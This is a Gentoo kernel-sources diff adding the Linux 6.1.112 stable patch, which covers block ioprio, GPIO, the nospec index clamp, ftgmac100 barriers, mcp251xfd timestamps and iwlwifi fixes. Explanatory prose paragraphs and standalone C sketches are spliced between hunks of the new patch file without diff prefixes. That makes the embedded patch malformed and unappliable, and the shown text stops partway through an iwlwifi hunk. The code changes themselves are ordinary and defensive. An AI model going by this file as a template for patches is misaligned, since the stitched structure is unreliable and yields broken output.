diff --git a/0000_README b/0000_README
index f2f39ba5..2f4d2822 100644
--- a/0000_README
+++ b/0000_README
@@ -491,6 +491,10 @@ Patch:  1110_linux-6.1.111.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.111
 
+Patch:  1111_linux-6.1.112.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.112
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1111_linux-6.1.112.patch b/1111_linux-6.1.112.patch
new file mode 100644
index 00000000..7a84c1a4
--- /dev/null
+++ b/1111_linux-6.1.112.patch
@@ -0,0 +1,3769 @@
+diff --git a/Makefile b/Makefile
+index d2ff3ff026255a..bc0473d33c2fc5 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 111
++SUBLEVEL = 112
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/loongarch/include/asm/hw_irq.h b/arch/loongarch/include/asm/hw_irq.h
+index af4f4e8fbd858f..8156ffb6741591 100644
+--- a/arch/loongarch/include/asm/hw_irq.h
++++ b/arch/loongarch/include/asm/hw_irq.h
+@@ -9,6 +9,8 @@
+ 
+ extern atomic_t irq_err_count;
+ 
++#define ARCH_IRQ_INIT_FLAGS	IRQ_NOPROBE
++
+ /*
+  * interrupt-retrigger: NOP for now. This may not be appropriate for all
+  * machines, we'll see ...
+diff --git a/arch/loongarch/kernel/irq.c b/arch/loongarch/kernel/irq.c
+index 0524bf1169b741..4496649c9e68b1 100644
+--- a/arch/loongarch/kernel/irq.c
++++ b/arch/loongarch/kernel/irq.c
+@@ -122,9 +122,6 @@ void __init init_IRQ(void)
+ 		panic("IPI IRQ request failed\n");
+ #endif
+ 
+-	for (i = 0; i < NR_IRQS; i++)
+-		irq_set_noprobe(i);
+-
+ 	for_each_possible_cpu(i) {
+ 		page = alloc_pages_node(cpu_to_node(i), GFP_KERNEL, order);
+ 
+diff --git a/arch/microblaze/mm/init.c b/arch/microblaze/mm/init.c
+index 353fabdfcbc540..2a3248194d505b 100644
+--- a/arch/microblaze/mm/init.c
++++ b/arch/microblaze/mm/init.c
+@@ -193,11 +193,6 @@ asmlinkage void __init mmu_init(void)
+ {
+ 	unsigned int kstart, ksize;
+ 
+-	if (!memblock.reserved.cnt) {
+-		pr_emerg("Error memory count\n");
+-		machine_restart(NULL);
+-	}
+-
+ 	if ((u32) memblock.memory.regions[0].size < 0x400000) {
+ 		pr_emerg("Memory must be greater than 4MB\n");
+ 		machine_restart(NULL);
+diff --git a/arch/x86/kernel/cpu/mshyperv.c b/arch/x86/kernel/cpu/mshyperv.c
+index 9b039e9635e40c..542b818c0d20dc 100644
+--- a/arch/x86/kernel/cpu/mshyperv.c
++++ b/arch/x86/kernel/cpu/mshyperv.c
+@@ -324,6 +324,7 @@ static void __init ms_hyperv_init_platform(void)
+ 	    ms_hyperv.misc_features & HV_FEATURE_FREQUENCY_MSRS_AVAILABLE) {
+ 		x86_platform.calibrate_tsc = hv_get_tsc_khz;
+ 		x86_platform.calibrate_cpu = hv_get_tsc_khz;
++		setup_force_cpu_cap(X86_FEATURE_TSC_KNOWN_FREQ);
+ 	}
+ 
+ 	if (ms_hyperv.priv_high & HV_ISOLATION) {
+diff --git a/arch/x86/mm/init.c b/arch/x86/mm/init.c
+index 913287b9340c93..ed861ef33f80a5 100644
+--- a/arch/x86/mm/init.c
++++ b/arch/x86/mm/init.c
+@@ -262,21 +262,17 @@ static void __init probe_page_size_mask(void)
+ 	}
+ }
+ 
+-#define INTEL_MATCH(_model) { .vendor  = X86_VENDOR_INTEL,	\
+-			      .family  = 6,			\
+-			      .model = _model,			\
+-			    }
+ /*
+  * INVLPG may not properly flush Global entries
+  * on these CPUs when PCIDs are enabled.
+  */
+ static const struct x86_cpu_id invlpg_miss_ids[] = {
+-	INTEL_MATCH(INTEL_FAM6_ALDERLAKE   ),
+-	INTEL_MATCH(INTEL_FAM6_ALDERLAKE_L ),
+-	INTEL_MATCH(INTEL_FAM6_ALDERLAKE_N ),
+-	INTEL_MATCH(INTEL_FAM6_RAPTORLAKE  ),
+-	INTEL_MATCH(INTEL_FAM6_RAPTORLAKE_P),
+-	INTEL_MATCH(INTEL_FAM6_RAPTORLAKE_S),
++	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE,      0),
++	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE_L,    0),
++	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE_N,    0),
++	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE,     0),
++	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_P,   0),
++	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_S,   0),
+ 	{}
+ };
+ 
+diff --git a/block/blk-core.c b/block/blk-core.c
+index a4155f123ab380..94941e3ce2194b 100644
+--- a/block/blk-core.c
++++ b/block/blk-core.c
+@@ -49,6 +49,7 @@
+ #include "blk-pm.h"
+ #include "blk-cgroup.h"
+ #include "blk-throttle.h"
++#include "blk-ioprio.h"
+ 
+ struct dentry *blk_debugfs_root;
+ 
+@@ -799,6 +800,14 @@ void submit_bio_noacct(struct bio *bio)
+ }
+ EXPORT_SYMBOL(submit_bio_noacct);
+ 
++static void bio_set_ioprio(struct bio *bio)
++{
++	/* Nobody set ioprio so far? Initialize it based on task's nice value */
++	if (IOPRIO_PRIO_CLASS(bio->bi_ioprio) == IOPRIO_CLASS_NONE)
++		bio->bi_ioprio = get_current_ioprio();
++	blkcg_set_ioprio(bio);
++}
++
+ /**
+  * submit_bio - submit a bio to the block device layer for I/O
+  * @bio: The &struct bio which describes the I/O
+@@ -824,6 +833,7 @@ void submit_bio(struct bio *bio)
+ 		count_vm_events(PGPGOUT, bio_sectors(bio));
+ 	}
+ 
++	bio_set_ioprio(bio);
+ 	submit_bio_noacct(bio);
+ }
+ EXPORT_SYMBOL(submit_bio);
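
This backport moves bio_set_ioprio() from blk-mq into submit_bio() so bio-based drivers also get a default priority. The rule itself is simple: an unset priority class falls back to one derived from the task's nice value. A sketch with illustrative constants (the shift and the nice-to-level mapping here approximate, but are not, the ioprio.h definitions):

enum { CLASS_NONE, CLASS_BE };

#define PRIO(class, level)	(((class) << 13) | (level))
#define PRIO_CLASS(p)		((p) >> 13)

static int effective_ioprio(int bio_prio, int task_nice)
{
	if (PRIO_CLASS(bio_prio) != CLASS_NONE)
		return bio_prio;		/* caller already chose */
	/* Map nice -20..19 onto a best-effort level, roughly 0..7. */
	return PRIO(CLASS_BE, (task_nice + 20) / 5);
}
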
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index daf0e4f3444e7c..542b28a2e6b0f1 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -42,7 +42,6 @@
+ #include "blk-stat.h"
+ #include "blk-mq-sched.h"
+ #include "blk-rq-qos.h"
+-#include "blk-ioprio.h"
+ 
+ static DEFINE_PER_CPU(struct llist_head, blk_cpu_done);
+ 
+@@ -2949,14 +2948,6 @@ static bool blk_mq_can_use_cached_rq(struct request *rq, struct blk_plug *plug,
+ 	return true;
+ }
+ 
+-static void bio_set_ioprio(struct bio *bio)
+-{
+-	/* Nobody set ioprio so far? Initialize it based on task's nice value */
+-	if (IOPRIO_PRIO_CLASS(bio->bi_ioprio) == IOPRIO_CLASS_NONE)
+-		bio->bi_ioprio = get_current_ioprio();
+-	blkcg_set_ioprio(bio);
+-}
+-
+ /**
+  * blk_mq_submit_bio - Create and send a request to block device.
+  * @bio: Bio pointer.
+@@ -2980,7 +2971,6 @@ void blk_mq_submit_bio(struct bio *bio)
+ 	blk_status_t ret;
+ 
+ 	bio = blk_queue_bounce(bio, q);
+-	bio_set_ioprio(bio);
+ 
+ 	if (plug) {
+ 		rq = rq_list_peek(&plug->cached_rq);
+diff --git a/drivers/gpio/gpiolib-cdev.c b/drivers/gpio/gpiolib-cdev.c
+index be51bd00d2fd28..55f640ef3feefd 100644
+--- a/drivers/gpio/gpiolib-cdev.c
++++ b/drivers/gpio/gpiolib-cdev.c
+@@ -1523,12 +1523,14 @@ static long linereq_set_config_unlocked(struct linereq *lr,
+ 		line = &lr->lines[i];
+ 		desc = lr->lines[i].desc;
+ 		flags = gpio_v2_line_config_flags(lc, i);
+-		gpio_v2_line_config_flags_to_desc_flags(flags, &desc->flags);
+-		edflags = flags & GPIO_V2_LINE_EDGE_DETECTOR_FLAGS;
+ 		/*
+-		 * Lines have to be requested explicitly for input
+-		 * or output, else the line will be treated "as is".
++		 * Lines not explicitly reconfigured as input or output
++		 * are left unchanged.
+ 		 */
++		if (!(flags & GPIO_V2_LINE_DIRECTION_FLAGS))
++			continue;
++		gpio_v2_line_config_flags_to_desc_flags(flags, &desc->flags);
++		edflags = flags & GPIO_V2_LINE_EDGE_DETECTOR_FLAGS;
+ 		if (flags & GPIO_V2_LINE_FLAG_OUTPUT) {
+ 			int val = gpio_v2_line_config_output_value(lc, i);
+ 
+@@ -1536,7 +1538,7 @@ static long linereq_set_config_unlocked(struct linereq *lr,
+ 			ret = gpiod_direction_output(desc, val);
+ 			if (ret)
+ 				return ret;
+-		} else if (flags & GPIO_V2_LINE_FLAG_INPUT) {
++		} else {
+ 			ret = gpiod_direction_input(desc);
+ 			if (ret)
+ 				return ret;
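
The gpiolib-cdev change above makes SET_CONFIG leave any line alone unless the new flags explicitly request input or output, instead of resetting it "as is". A compact sketch of that rule (flag values and the callback are invented for the example):

#define FL_INPUT	0x1
#define FL_OUTPUT	0x2
#define FL_DIR		(FL_INPUT | FL_OUTPUT)

static int reconfigure(const unsigned int *flags, int n,
		       int (*set_dir)(int line, int output))
{
	for (int i = 0; i < n; i++) {
		int ret;

		if (!(flags[i] & FL_DIR))
			continue;	/* leave this line unchanged */
		ret = set_dir(i, !!(flags[i] & FL_OUTPUT));
		if (ret)
			return ret;
	}
	return 0;
}
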
+diff --git a/drivers/gpio/gpiolib.c b/drivers/gpio/gpiolib.c
+index 9d8c783124033c..a0c1dabd293984 100644
+--- a/drivers/gpio/gpiolib.c
++++ b/drivers/gpio/gpiolib.c
+@@ -5,6 +5,7 @@
+ #include <linux/module.h>
+ #include <linux/interrupt.h>
+ #include <linux/irq.h>
++#include <linux/nospec.h>
+ #include <linux/spinlock.h>
+ #include <linux/list.h>
+ #include <linux/device.h>
+@@ -146,7 +147,7 @@ struct gpio_desc *gpiochip_get_desc(struct gpio_chip *gc,
+ 	if (hwnum >= gdev->ngpio)
+ 		return ERR_PTR(-EINVAL);
+ 
+-	return &gdev->descs[hwnum];
++	return &gdev->descs[array_index_nospec(hwnum, gdev->ngpio)];
+ }
+ EXPORT_SYMBOL_GPL(gpiochip_get_desc);
+ 
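
gpiochip_get_desc() now clamps the hardware offset with array_index_nospec() so a bounds check that is mispredicted speculatively still cannot index out of range. A sketch of the branch-free clamp, mirroring the kernel's generic array_index_mask_nospec() and assuming arithmetic right shift of signed values (as the kernel does); the lookup function is illustrative:

#include <stddef.h>
#include <stdint.h>

/* All-ones if index < size, zero otherwise, without a branch. */
static uint64_t index_mask(uint64_t index, uint64_t size)
{
	return ~(int64_t)(index | (size - 1 - index)) >> 63;
}

static const int *safe_lookup(const int *arr, uint64_t n, uint64_t i)
{
	if (i >= n)
		return NULL;			/* architectural check */
	return &arr[i & index_mask(i, n)];	/* speculative clamp */
}
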
+diff --git a/drivers/gpu/drm/arm/display/komeda/komeda_kms.c b/drivers/gpu/drm/arm/display/komeda/komeda_kms.c
+index 451746ebbe7138..89f3d6aa72b087 100644
+--- a/drivers/gpu/drm/arm/display/komeda/komeda_kms.c
++++ b/drivers/gpu/drm/arm/display/komeda/komeda_kms.c
+@@ -163,6 +163,7 @@ static int komeda_crtc_normalize_zpos(struct drm_crtc *crtc,
+ 	struct drm_plane *plane;
+ 	struct list_head zorder_list;
+ 	int order = 0, err;
++	u32 slave_zpos = 0;
+ 
+ 	DRM_DEBUG_ATOMIC("[CRTC:%d:%s] calculating normalized zpos values\n",
+ 			 crtc->base.id, crtc->name);
+@@ -202,10 +203,13 @@ static int komeda_crtc_normalize_zpos(struct drm_crtc *crtc,
+ 				 plane_st->zpos, plane_st->normalized_zpos);
+ 
+ 		/* calculate max slave zorder */
+-		if (has_bit(drm_plane_index(plane), kcrtc->slave_planes))
++		if (has_bit(drm_plane_index(plane), kcrtc->slave_planes)) {
++			slave_zpos = plane_st->normalized_zpos;
++			if (to_kplane_st(plane_st)->layer_split)
++				slave_zpos++;
+ 			kcrtc_st->max_slave_zorder =
+-				max(plane_st->normalized_zpos,
+-				    kcrtc_st->max_slave_zorder);
++				max(slave_zpos, kcrtc_st->max_slave_zorder);
++		}
+ 	}
+ 
+ 	crtc_st->zpos_changed = true;
+diff --git a/drivers/hwmon/asus-ec-sensors.c b/drivers/hwmon/asus-ec-sensors.c
+index b4d65916b3c000..d893cfd1cb829a 100644
+--- a/drivers/hwmon/asus-ec-sensors.c
++++ b/drivers/hwmon/asus-ec-sensors.c
+@@ -369,7 +369,7 @@ static const struct ec_board_info board_info_strix_b550_i_gaming = {
+ 
+ static const struct ec_board_info board_info_strix_x570_e_gaming = {
+ 	.sensors = SENSOR_SET_TEMP_CHIPSET_CPU_MB |
+-		SENSOR_TEMP_T_SENSOR | SENSOR_TEMP_VRM |
++		SENSOR_TEMP_T_SENSOR |
+ 		SENSOR_FAN_CHIPSET | SENSOR_CURR_CPU |
+ 		SENSOR_IN_CPU_CORE,
+ 	.mutex_path = ASUS_HW_ACCESS_MUTEX_ASMX,
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
+index a9bafa96e2f926..6fecfe4cd08041 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
+@@ -744,6 +744,7 @@ static void mcp251xfd_chip_stop(struct mcp251xfd_priv *priv,
+ 
+ 	mcp251xfd_chip_interrupts_disable(priv);
+ 	mcp251xfd_chip_rx_int_disable(priv);
++	mcp251xfd_timestamp_stop(priv);
+ 	mcp251xfd_chip_sleep(priv);
+ }
+ 
+@@ -763,6 +764,8 @@ static int mcp251xfd_chip_start(struct mcp251xfd_priv *priv)
+ 	if (err)
+ 		goto out_chip_stop;
+ 
++	mcp251xfd_timestamp_start(priv);
++
+ 	err = mcp251xfd_set_bittiming(priv);
+ 	if (err)
+ 		goto out_chip_stop;
+@@ -791,7 +794,7 @@ static int mcp251xfd_chip_start(struct mcp251xfd_priv *priv)
+ 
+ 	return 0;
+ 
+- out_chip_stop:
++out_chip_stop:
+ 	mcp251xfd_dump(priv);
+ 	mcp251xfd_chip_stop(priv, CAN_STATE_STOPPED);
+ 
+@@ -1576,7 +1579,7 @@ static irqreturn_t mcp251xfd_irq(int irq, void *dev_id)
+ 		handled = IRQ_HANDLED;
+ 	} while (1);
+ 
+- out_fail:
++out_fail:
+ 	can_rx_offload_threaded_irq_finish(&priv->offload);
+ 
+ 	netdev_err(priv->ndev, "IRQ handler returned %d (intf=0x%08x).\n",
+@@ -1610,11 +1613,12 @@ static int mcp251xfd_open(struct net_device *ndev)
+ 	if (err)
+ 		goto out_mcp251xfd_ring_free;
+ 
++	mcp251xfd_timestamp_init(priv);
++
+ 	err = mcp251xfd_chip_start(priv);
+ 	if (err)
+ 		goto out_transceiver_disable;
+ 
+-	mcp251xfd_timestamp_init(priv);
+ 	clear_bit(MCP251XFD_FLAGS_DOWN, priv->flags);
+ 	can_rx_offload_enable(&priv->offload);
+ 
+@@ -1641,22 +1645,21 @@ static int mcp251xfd_open(struct net_device *ndev)
+ 
+ 	return 0;
+ 
+- out_free_irq:
++out_free_irq:
+ 	free_irq(spi->irq, priv);
+- out_destroy_workqueue:
++out_destroy_workqueue:
+ 	destroy_workqueue(priv->wq);
+- out_can_rx_offload_disable:
++out_can_rx_offload_disable:
+ 	can_rx_offload_disable(&priv->offload);
+ 	set_bit(MCP251XFD_FLAGS_DOWN, priv->flags);
+-	mcp251xfd_timestamp_stop(priv);
+- out_transceiver_disable:
++out_transceiver_disable:
+ 	mcp251xfd_transceiver_disable(priv);
+- out_mcp251xfd_ring_free:
++out_mcp251xfd_ring_free:
+ 	mcp251xfd_ring_free(priv);
+- out_pm_runtime_put:
++out_pm_runtime_put:
+ 	mcp251xfd_chip_stop(priv, CAN_STATE_STOPPED);
+ 	pm_runtime_put(ndev->dev.parent);
+- out_close_candev:
++out_close_candev:
+ 	close_candev(ndev);
+ 
+ 	return err;
+@@ -1674,7 +1677,6 @@ static int mcp251xfd_stop(struct net_device *ndev)
+ 	free_irq(ndev->irq, priv);
+ 	destroy_workqueue(priv->wq);
+ 	can_rx_offload_disable(&priv->offload);
+-	mcp251xfd_timestamp_stop(priv);
+ 	mcp251xfd_chip_stop(priv, CAN_STATE_STOPPED);
+ 	mcp251xfd_transceiver_disable(priv);
+ 	mcp251xfd_ring_free(priv);
+@@ -1820,9 +1822,9 @@ mcp251xfd_register_get_dev_id(const struct mcp251xfd_priv *priv, u32 *dev_id,
+ 	*effective_speed_hz_slow = xfer[0].effective_speed_hz;
+ 	*effective_speed_hz_fast = xfer[1].effective_speed_hz;
+ 
+- out_kfree_buf_tx:
++out_kfree_buf_tx:
+ 	kfree(buf_tx);
+- out_kfree_buf_rx:
++out_kfree_buf_rx:
+ 	kfree(buf_rx);
+ 
+ 	return err;
+@@ -1936,13 +1938,13 @@ static int mcp251xfd_register(struct mcp251xfd_priv *priv)
+ 
+ 	return 0;
+ 
+- out_unregister_candev:
++out_unregister_candev:
+ 	unregister_candev(ndev);
+- out_chip_sleep:
++out_chip_sleep:
+ 	mcp251xfd_chip_sleep(priv);
+- out_runtime_disable:
++out_runtime_disable:
+ 	pm_runtime_disable(ndev->dev.parent);
+- out_runtime_put_noidle:
++out_runtime_put_noidle:
+ 	pm_runtime_put_noidle(ndev->dev.parent);
+ 	mcp251xfd_clks_and_vdd_disable(priv);
+ 
+@@ -2162,9 +2164,9 @@ static int mcp251xfd_probe(struct spi_device *spi)
+ 
+ 	return 0;
+ 
+- out_can_rx_offload_del:
++out_can_rx_offload_del:
+ 	can_rx_offload_del(&priv->offload);
+- out_free_candev:
++out_free_candev:
+ 	spi->max_speed_hz = priv->spi_max_speed_hz_orig;
+ 
+ 	free_candev(ndev);
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-dump.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-dump.c
+index 004eaf96262bfd..050321345304be 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-dump.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-dump.c
+@@ -94,7 +94,7 @@ static void mcp251xfd_dump_registers(const struct mcp251xfd_priv *priv,
+ 		kfree(buf);
+ 	}
+ 
+- out:
++out:
+ 	mcp251xfd_dump_header(iter, MCP251XFD_DUMP_OBJECT_TYPE_REG, reg);
+ }
+ 
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-regmap.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-regmap.c
+index 92b7bc7f14b9eb..65150e76200720 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-regmap.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-regmap.c
+@@ -397,7 +397,7 @@ mcp251xfd_regmap_crc_read(void *context,
+ 
+ 		return err;
+ 	}
+- out:
++out:
+ 	memcpy(val_buf, buf_rx->data, val_len);
+ 
+ 	return 0;
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c
+index 0fde8154a649bf..a894cb1fb9bfe1 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c
+@@ -280,7 +280,7 @@ int mcp251xfd_ring_init(struct mcp251xfd_priv *priv)
+ 	const struct mcp251xfd_rx_ring *rx_ring;
+ 	u16 base = 0, ram_used;
+ 	u8 fifo_nr = 1;
+-	int i;
++	int err = 0, i;
+ 
+ 	netdev_reset_queue(priv->ndev);
+ 
+@@ -376,10 +376,18 @@ int mcp251xfd_ring_init(struct mcp251xfd_priv *priv)
+ 		netdev_err(priv->ndev,
+ 			   "Error during ring configuration, using more RAM (%u bytes) than available (%u bytes).\n",
+ 			   ram_used, MCP251XFD_RAM_SIZE);
+-		return -ENOMEM;
++		err = -ENOMEM;
+ 	}
+ 
+-	return 0;
++	if (priv->tx_obj_num_coalesce_irq &&
++	    priv->tx_obj_num_coalesce_irq * 2 != priv->tx->obj_num) {
++		netdev_err(priv->ndev,
++			   "Error during ring configuration, number of TEF coalescing buffers (%u) must be half of TEF buffers (%u).\n",
++			   priv->tx_obj_num_coalesce_irq, priv->tx->obj_num);
++		err = -EINVAL;
++	}
++
++	return err;
+ }
+ 
+ void mcp251xfd_ring_free(struct mcp251xfd_priv *priv)
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c
+index 8f39730f3122ec..d4df5ccb60e3c2 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c
+@@ -219,7 +219,7 @@ int mcp251xfd_handle_tefif(struct mcp251xfd_priv *priv)
+ 		total_frame_len += frame_len;
+ 	}
+ 
+- out_netif_wake_queue:
++out_netif_wake_queue:
+ 	len = i;	/* number of handled goods TEFs */
+ 	if (len) {
+ 		struct mcp251xfd_tef_ring *ring = priv->tef;
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-timestamp.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-timestamp.c
+index 1db99aabe85c56..202ca0d24d03b9 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-timestamp.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-timestamp.c
+@@ -48,9 +48,12 @@ void mcp251xfd_timestamp_init(struct mcp251xfd_priv *priv)
+ 	cc->shift = 1;
+ 	cc->mult = clocksource_hz2mult(priv->can.clock.freq, cc->shift);
+ 
+-	timecounter_init(&priv->tc, &priv->cc, ktime_get_real_ns());
+-
+ 	INIT_DELAYED_WORK(&priv->timestamp, mcp251xfd_timestamp_work);
++}
++
++void mcp251xfd_timestamp_start(struct mcp251xfd_priv *priv)
++{
++	timecounter_init(&priv->tc, &priv->cc, ktime_get_real_ns());
+ 	schedule_delayed_work(&priv->timestamp,
+ 			      MCP251XFD_TIMESTAMP_WORK_DELAY_SEC * HZ);
+ }
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd.h b/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
+index c07300443c6a3e..0711a2f3c037aa 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
+@@ -939,6 +939,7 @@ int mcp251xfd_ring_alloc(struct mcp251xfd_priv *priv);
+ int mcp251xfd_handle_rxif(struct mcp251xfd_priv *priv);
+ int mcp251xfd_handle_tefif(struct mcp251xfd_priv *priv);
+ void mcp251xfd_timestamp_init(struct mcp251xfd_priv *priv);
++void mcp251xfd_timestamp_start(struct mcp251xfd_priv *priv);
+ void mcp251xfd_timestamp_stop(struct mcp251xfd_priv *priv);
+ 
+ void mcp251xfd_tx_obj_write_sync(struct work_struct *work);
+diff --git a/drivers/net/ethernet/faraday/ftgmac100.c b/drivers/net/ethernet/faraday/ftgmac100.c
+index a03879a27b0416..7adc46aa75e66c 100644
+--- a/drivers/net/ethernet/faraday/ftgmac100.c
++++ b/drivers/net/ethernet/faraday/ftgmac100.c
+@@ -566,7 +566,7 @@ static bool ftgmac100_rx_packet(struct ftgmac100 *priv, int *processed)
+ 	(*processed)++;
+ 	return true;
+ 
+- drop:
++drop:
+ 	/* Clean rxdes0 (which resets own bit) */
+ 	rxdes->rxdes0 = cpu_to_le32(status & priv->rxdes0_edorr_mask);
+ 	priv->rx_pointer = ftgmac100_next_rx_pointer(priv, pointer);
+@@ -650,6 +650,11 @@ static bool ftgmac100_tx_complete_packet(struct ftgmac100 *priv)
+ 	ftgmac100_free_tx_packet(priv, pointer, skb, txdes, ctl_stat);
+ 	txdes->txdes0 = cpu_to_le32(ctl_stat & priv->txdes0_edotr_mask);
+ 
++	/* Ensure the descriptor config is visible before setting the tx
++	 * pointer.
++	 */
++	smp_wmb();
++
+ 	priv->tx_clean_pointer = ftgmac100_next_tx_pointer(priv, pointer);
+ 
+ 	return true;
+@@ -803,6 +808,11 @@ static netdev_tx_t ftgmac100_hard_start_xmit(struct sk_buff *skb,
+ 	dma_wmb();
+ 	first->txdes0 = cpu_to_le32(f_ctl_stat);
+ 
++	/* Ensure the descriptor config is visible before setting the tx
++	 * pointer.
++	 */
++	smp_wmb();
++
+ 	/* Update next TX pointer */
+ 	priv->tx_pointer = pointer;
+ 
+@@ -823,7 +833,7 @@ static netdev_tx_t ftgmac100_hard_start_xmit(struct sk_buff *skb,
+ 
+ 	return NETDEV_TX_OK;
+ 
+- dma_err:
++dma_err:
+ 	if (net_ratelimit())
+ 		netdev_err(netdev, "map tx fragment failed\n");
+ 
+@@ -845,7 +855,7 @@ static netdev_tx_t ftgmac100_hard_start_xmit(struct sk_buff *skb,
+ 	 * last fragment, so we know ftgmac100_free_tx_packet()
+ 	 * hasn't freed the skb yet.
+ 	 */
+- drop:
++drop:
+ 	/* Drop the packet */
+ 	dev_kfree_skb_any(skb);
+ 	netdev->stats.tx_dropped++;
+@@ -1338,7 +1348,7 @@ static void ftgmac100_reset(struct ftgmac100 *priv)
+ 	ftgmac100_init_all(priv, true);
+ 
+ 	netdev_dbg(netdev, "Reset done !\n");
+- bail:
++bail:
+ 	if (priv->mii_bus)
+ 		mutex_unlock(&priv->mii_bus->mdio_lock);
+ 	if (netdev->phydev)
+@@ -1537,15 +1547,15 @@ static int ftgmac100_open(struct net_device *netdev)
+ 
+ 	return 0;
+ 
+- err_ncsi:
++err_ncsi:
+ 	napi_disable(&priv->napi);
+ 	netif_stop_queue(netdev);
+- err_alloc:
++err_alloc:
+ 	ftgmac100_free_buffers(priv);
+ 	free_irq(netdev->irq, netdev);
+- err_irq:
++err_irq:
+ 	netif_napi_del(&priv->napi);
+- err_hw:
++err_hw:
+ 	iowrite32(0, priv->base + FTGMAC100_OFFSET_IER);
+ 	ftgmac100_free_rings(priv);
+ 	return err;
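
The ftgmac100 fix above inserts smp_wmb() so descriptor contents are globally visible before the tx pointer that publishes them. In C11 terms that is a release store, paired with an acquire load on the consumer side. A single-producer sketch (ring size and field names are illustrative):

#include <stdatomic.h>

struct desc { unsigned long ctl; };

struct ring {
	struct desc d[64];
	_Atomic unsigned int head;	/* producer publishes via this */
};

static void produce(struct ring *r, unsigned long ctl)
{
	unsigned int h = atomic_load_explicit(&r->head,
					      memory_order_relaxed);

	r->d[h % 64].ctl = ctl;		/* fill the descriptor first ... */
	/* ... then publish; the consumer must load head with acquire. */
	atomic_store_explicit(&r->head, h + 1, memory_order_release);
}
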
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/dbg.c b/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
+index 3b0ed1cdfa11ed..7fadaec777cea6 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
+@@ -3131,7 +3131,7 @@ void iwl_fw_dbg_stop_restart_recording(struct iwl_fw_runtime *fwrt,
+ {
+ 	int ret __maybe_unused = 0;
+ 
+-	if (test_bit(STATUS_FW_ERROR, &fwrt->trans->status))
++	if (!iwl_trans_fw_running(fwrt->trans))
+ 		return;
+ 
+ 	if (fw_has_capa(&fwrt->fw->ucode_capa,
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-trans.h b/drivers/net/wireless/intel/iwlwifi/iwl-trans.h
+index 70022cadee35b9..ad29663a356be0 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-trans.h
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-trans.h
+@@ -1472,8 +1472,8 @@ static inline void iwl_trans_fw_error(struct iwl_trans *trans, bool sync)
+ 
+ 	/* prevent double restarts due to the same erroneous FW */
+ 	if (!test_and_set_bit(STATUS_FW_ERROR, &trans->status)) {
+-		iwl_op_mode_nic_error(trans->op_mode, sync);
+ 		trans->state = IWL_TRANS_NO_FW;
++		iwl_op_mode_nic_error(trans->op_mode, sync);
+ 	}
+ }
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+index 4e8bdd3d701bf2..bd4301857ba87f 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+@@ -4800,6 +4800,10 @@ static void iwl_mvm_flush_no_vif(struct iwl_mvm *mvm, u32 queues, bool drop)
+ 	int i;
+ 
+ 	if (!iwl_mvm_has_new_tx_api(mvm)) {
++		/* we can't ask the firmware anything if it is dead */
++		if (test_bit(IWL_MVM_STATUS_HW_RESTART_REQUESTED,
++			     &mvm->status))
++			return;
+ 		if (drop) {
+ 			mutex_lock(&mvm->mutex);
+ 			iwl_mvm_flush_tx_path(mvm,
